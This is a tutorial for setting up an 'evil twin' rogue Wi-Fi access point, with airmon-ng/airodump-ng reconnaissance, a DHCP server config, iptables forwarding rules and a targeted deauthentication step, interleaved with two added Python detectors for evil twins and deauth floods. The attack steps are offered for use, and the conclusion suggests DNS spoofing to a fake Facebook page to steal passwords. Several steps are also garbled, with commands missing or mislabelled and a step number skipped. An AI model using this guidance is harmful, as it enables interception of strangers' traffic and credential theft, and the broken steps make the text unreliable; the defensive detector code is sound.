Set Up an Evil Twin
Step 1 Sniff the Air
First, the victim AP's information must be observed. There are two options to do so; I prefer these commands:
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"
"airmon-ng start wlan0"
If you have trouble with this, type "airmon-ng check" and maybe kill some of the PIDs, but be careful not to kill your own network connection.
Once monitor mode is enabled, start checking the air for the APs sending their beacons:
airodump-ng wlan0
The last command will provide you with the information you need to set up the fake AP:
- BSSID of the real AP
- channel of the real AP
- encryption of the real AP
- ESSID of the real AP
In this example:
- BSSID 64:7C:34:92:2B:41
- Channel 2
- no encryption
- ESSID wireless
Leave this terminal open and airodump running.
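The same four fields that airodump-ng reports here (BSSID, channel, encryption, ESSID) are what a defender compares against an inventory to spot an evil twin. The following is an added example, not code from the original tutorial: it parses scan lines in airodump-ng's column order and raises an alert when one of our own ESSIDs is advertised by a BSSID that is not in the inventory, or when an inventoried BSSID shows up with a different encryption setting or channel than expected (the case where the twin copied the BSSID as well). The trusted inventory and the scan lines are constructed for this example, not taken from a real capture.

```python
"""Evil-twin detection from airodump-ng style scan records.

Added example (not the tutorial's own code). Assumes a trusted inventory
of the access points we actually operate; everything below is constructed
sample data, not a real capture.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ApRecord:
    bssid: str
    channel: int
    privacy: str  # airodump-ng's ENC column: OPN, WEP, WPA, WPA2 ...
    essid: str


# Constructed inventory: ESSID -> {BSSID: (expected channel, expected encryption)}.
TRUSTED_APS = {
    "corp-wifi": {"02:00:00:00:00:01": (6, "WPA2")},
}

# Constructed scan lines in the column order airodump-ng prints:
# BSSID, CH, ENC, ESSID. Line 2 is a twin on a new BSSID with encryption
# dropped; line 3 is a twin that also copied our BSSID but sits on another channel.
SAMPLE_SCAN = """\
# BSSID, CH, ENC, ESSID
02:00:00:00:00:01, 6, WPA2, corp-wifi
02:00:00:00:00:02, 6, OPN, corp-wifi
02:00:00:00:00:01, 11, OPN, corp-wifi
02:00:00:00:00:03, 1, WPA2, neighbour-net
"""


def parse_scan(text: str) -> list[ApRecord]:
    """Parse comma-separated scan lines; blank lines and '#' comments are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        bssid, channel, privacy, essid = (f.strip() for f in line.split(",", 3))
        records.append(ApRecord(bssid.upper(), int(channel), privacy.upper(), essid))
    return records


def find_evil_twins(records, trusted=TRUSTED_APS):
    """Return (kind, bssid, essid) alerts for records that contradict the inventory.

    Only ESSIDs we operate are checked: a neighbour's network is not our twin.
    """
    alerts = []
    for rec in records:
        known = trusted.get(rec.essid)
        if known is None:
            continue
        expected = known.get(rec.bssid)
        if expected is None:
            # Our ESSID advertised by a BSSID we never deployed.
            alerts.append(("UNKNOWN_BSSID", rec.bssid, rec.essid))
            continue
        exp_channel, exp_privacy = expected
        if rec.privacy != exp_privacy:
            # Same BSSID and ESSID but different encryption: a cloned BSSID.
            alerts.append(("ENCRYPTION_MISMATCH", rec.bssid, rec.essid))
        if rec.channel != exp_channel:
            alerts.append(("CHANNEL_MISMATCH", rec.bssid, rec.essid))
    return alerts


def run_example():
    """Run the detector over the constructed scan and return its alerts."""
    return find_evil_twins(parse_scan(SAMPLE_SCAN))


if __name__ == "__main__":
    for kind, bssid, essid in run_example():
        print(f"{kind}: {bssid} advertising {essid!r}")
```

In practice the scan text would come from a periodic airodump-ng run (its CSV output has more columns; only the four used here matter) and the inventory from the WLAN controller. Note that a mismatch on an inventoried BSSID is only visible while both the real AP and the twin are beaconing, so the check should run on every scan, not once.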
Step 2 Set Up DHCP-Server
To provide our fake AP with an internet connection we have to set up a DHCP server, which gives the fake AP's clients an IP address and subnet. Open a new terminal and check whether isc-dhcp-server is already installed. If not:
"apt-get install isc-dhcp-server"
"gedit /etc/dhcp/dhcpd.conf"
Add these lines to the bottom:
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0
{
	option subnet-mask 255.255.255.0;
	option broadcast-address 192.168.2.255;
	option domain-name-servers 8.8.8.8;
	option routers 192.168.2.1;
	range 192.168.2.20 192.168.2.60;
}
(Indent the lines between the braces with a TAB.)
The lease time sets how long an assigned IP address stays valid.
Save the file.
Step 3 Create the Evil Twin
Now type the command in the second terminal. With that we have created the evil-twin AP. I did not change the BSSID, just the ESSID.
For completeness: to change the BSSID as well and not just the ESSID, type the following.
But for this attack it is not really necessary and would just confuse you while monitoring the results.
"airodump-ng --bssid C4:E9:84:0D:9C:FA -c 2 wlan0"
Term1: monitors the real-AP
Term2: runs the fake-AP
Term3: monitors the fake-AP
"ifconfig at0"
should now show you some output.
"ifconfig at0 up"
"ifconfig at0 192.168.2.1 netmask 255.255.255.0"
Now start the DHCP server:
"dhcpd -cf /etc/dhcp/dhcpd.conf"
To be sure the file is loaded correctly:
"service isc-dhcp-server restart"
Step 5 Configure Your Firewall
Last step before we go. Just type these commands:
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD -j ACCEPT --in-interface at0
echo 1 > /proc/sys/net/ipv4/ip_forward
They configure your firewall to route all traffic from at0 to eth0.
The last command tells your network card: "act like a router and forward all traffic to its destination".
Step 6 Shoot Down the Connection
Open a fourth terminal and send deauthentication frames to the device which sticks to the real AP. --deauth 0 means the frames will be sent in an endless loop
(or until we have the connection we want).
-a defines the BSSID of the AP
-c defines the MAC of the device we want to observe
We only shoot down one specific device to avoid drawing too much attention through network flutter.
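From the monitoring side, the --deauth 0 loop described above looks like a burst of deauthentication (subtype 12) or disassociation (subtype 10) management frames from the AP's BSSID to one client, far denser than an AP would ever send on its own. The following is an added example, not code from the original tutorial: a sliding-window counter over parsed frame records (timestamp, source MAC, destination MAC, subtype) that alerts when one source sends at least a threshold of such frames to one destination within a second. The frame records are constructed for this example; on a real deployment they would come from a capture on a monitor-mode interface. Where the real AP and its clients support 802.11w (Protected Management Frames), unauthenticated deauthentication frames are simply ignored, which is the mitigation; the detector is for networks where that is not yet enabled.

```python
"""Deauthentication-flood detection over parsed 802.11 management frames.

Added example (not the tutorial's own code). It works on already-parsed
frame records (timestamp, source MAC, destination MAC, frame subtype); the
records below are constructed, not captured.
"""
from collections import defaultdict, deque

# 802.11 management frame subtypes relevant here.
SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC

AP_BSSID = "02:00:00:00:00:01"   # constructed
CLIENT_A = "02:00:00:00:00:21"   # constructed: receives one legitimate deauth
CLIENT_B = "02:00:00:00:00:22"   # constructed: target of the flood
BROADCAST = "ff:ff:ff:ff:ff:ff"


def sample_frames():
    """Constructed frame list: 6 s of beacons, one normal deauth, then a 15-frame burst."""
    frames = [(t / 10, AP_BSSID, BROADCAST, SUBTYPE_BEACON) for t in range(0, 60)]
    frames.append((1.5, AP_BSSID, CLIENT_A, SUBTYPE_DEAUTH))  # a single, normal deauth
    frames += [(5.0 + i * 0.02, AP_BSSID, CLIENT_B, SUBTYPE_DEAUTH) for i in range(15)]
    return sorted(frames, key=lambda f: f[0])


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Alert once per (src, dst) pair when at least `threshold` deauth/disassoc
    frames arrive within `window` seconds. Returns (src, dst, window_start, count).

    Frames must be in time order. Broadcast destinations are counted like any
    other, so a "deauth everyone" flood is caught as well as a targeted one.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for ts, src, dst, subtype in frames:
        if subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        key = (src.lower(), dst.lower())
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()   # drop timestamps that fell out of the window
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((key[0], key[1], q[0], len(q)))
    return alerts


def run_example():
    """Run the detector over the constructed frames and return its alerts."""
    return detect_deauth_flood(sample_frames())


if __name__ == "__main__":
    for src, dst, start, count in run_example():
        print(f"deauth flood: {src} -> {dst}, {count} frames from t={start:.2f}s")
```

The threshold and window are tuning knobs: a real AP may send a handful of deauthentication frames per minute during normal roaming, but tens per second to one client only happen under an injection loop. Because the alert is keyed on the (source, destination) pair, a targeted attack on one client, which the tutorial prefers for its lower visibility, is still reported.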
Step 7 Conclusion
These steps seem complicated for this kind of wifi hack. When you write a script for starting the DHCP server and flushing the firewall rules, it won't take more than 2 minutes to set up this attack. Theoretically you can write a script for the whole setup.
Benefit 1 is that this device now gets its IP address from our DHCP server, so we are in the same network...our network (injection and so on).
Benefit 2: you can expand this attack to set up DNS spoofing, so the victim gets redirected to a fake Facebook site and we grab his password.